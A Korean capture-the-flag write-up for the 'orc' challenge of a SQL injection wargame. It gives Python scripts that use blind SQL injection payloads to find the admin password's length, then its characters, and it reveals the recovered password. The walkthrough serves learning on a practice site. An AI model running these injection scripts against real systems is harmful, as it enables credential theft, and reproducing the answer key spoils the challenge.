4번문제의 php코드
1.문제풀이
1) 코드해석
- 이번문제에서는 여태까지와는 다르게 단순히 admin계정으로 접속했다고 풀리는 문제가 아니다
- 다음 코드와 같이 admin의 실제 비밀번호를 탈취해서 접속해야 풀리는 문제다
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc");
- 따라서 이번 문제는 Blind SQLi문제로 자동화 도구를 이용해서 문제를 풀어보겠다
2) 문제풀이
2-1 비밀번호 길이를 알아내는 python 코드
import requests
url = 'https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php'
cookies = {'PHPSESSID': 'cookie'}
def find_pw_len():
pw_len = 0
while 1:
pw_len=pw_len+1
value = "' or id='admin' and length(pw) = {} -- '".format(pw_len)
params = {"pw": value}
response = requests.get(url,params=params, cookies=cookies)
print(response.status_code)
print(value)
if "Hello admin" in response.text:
break
return pw_len
if __name__ == '__main__':
print("pw의 길이는 : "+str(find_pw_len()))
공격 결과 화면
- 비밀번호의 길이를 알아냈으므로 이젠 실제 비밀번호를 자동화도구를 통해서 알아내도록 하겠다
2-2 실제 비밀번호를 알아내는 python코드
import requests
url = 'https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php'
cookies = {'PHPSESSID': 'cookie'}
def find_pw_len():
pw_len = 0
while 1:
pw_len=pw_len+1
value = "' or id = 'admin' and length(pw) = {} -- '".format(pw_len)
params = {'pw': value}
response = requests.get(url,params=params, cookies=cookies)
print(response.status_code)
print(value)
if "Hello admin" in response.text:
break
return pw_len
def find_pw_str(pw_len):
pw_str = ""
for len in range(1,pw_len+1):
for ascii in range(0,127):
value = "' or ascii(substring(pw,{},1)) = {} -- '".format(len,ascii)
params = {'pw': value}
response = requests.get(url, params=params, cookies=cookies)
print(response.status_code)
print(value)
if "Hello admin" in response.text:
pw_str+=chr(ascii)+":"
pw_str+="\n"
return pw_str
if __name__ == '__main__':
print("비밀번호 조합 : \n"+find_pw_str(find_pw_len()))
공격 결과 화면
- 자동화 도구를 통해 우리는admin계정의 비밀번호가 095a9852 인것을 알 수 있다
- 실제로 파라미터에 대입해보면 접속이 성공한다
- 공격 시 삽입 구문: id=admin&pw=095a9852
- 공격 후 구문: https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?id=admin&pw=095a9852
- 공격을 수행하면 결과적으로 SQL쿼리문에 다음과 같이 공격 시 삽입 구문이 대입되므로 공격이 성공한다.
select id from prob_orc where id='admin' and pw='095a9852'
공격 성공 화면